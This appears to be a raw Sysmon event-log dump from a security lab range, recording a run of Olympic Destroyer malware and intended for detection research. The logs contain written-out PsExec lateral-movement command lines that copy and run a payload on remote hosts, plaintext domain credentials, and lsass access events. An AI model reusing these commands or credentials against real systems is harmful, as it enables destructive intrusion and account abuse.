www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.230{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9305-000000003802}6696C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:48.245{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D8C63556F7D16C9B3395DFE42700366,SHA256=659D4D4CE5651AC4459FA7086B4E78911633AF88A54260B98CF12B930506A0FA,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000291348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.230{C8EA50B7-12EF-6216-8F05-000000003802}6252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.214{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8F05-000000003802}6252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.214{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8F05-000000003802}6252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.214{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9205-000000003802}6652C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.214{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9205-000000003802}6652C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:48.214{C8EA50B7-12EF-6216-8F05-000000003802}6252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.199{C8EA50B7-12F0-6216-9205-000000003802}66526536C:\Windows\system32\conhost.exe{C8EA50B7-12F0-6216-9005-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.167{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9105-000000003802}6596C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.167{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F0-6216-9105-000000003802}6596C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.166{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9205-000000003802}6652C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.146{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9205-000000003802}6652C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.146{C8EA50B7-12F0-6216-9105-000000003802}65966648C:\Windows\system32\conhost.exe{C8EA50B7-12EF-6216-8F05-000000003802}6252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.115{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9105-000000003802}6596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.115{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9105-000000003802}6596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.100{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=944F172882BDCE23F2D4792AB13F1A9A,SHA256=29B60F10609BF615A737D3BD8FE2B070E5645FE157D5A915E199BF2EC647D369,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.015{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9005-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.015{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.015{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.015{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.015{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.015{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F0-6216-9005-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.018{C8EA50B7-12F0-6216-9005-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.015{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F0-6216-9005-000000003802}6460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.999{C8EA50B7-12EF-6216-8D05-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.999{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.999{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.999{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.999{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.999{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8D05-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.999{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8D05-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.983{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8F05-000000003802}6252C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000291317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 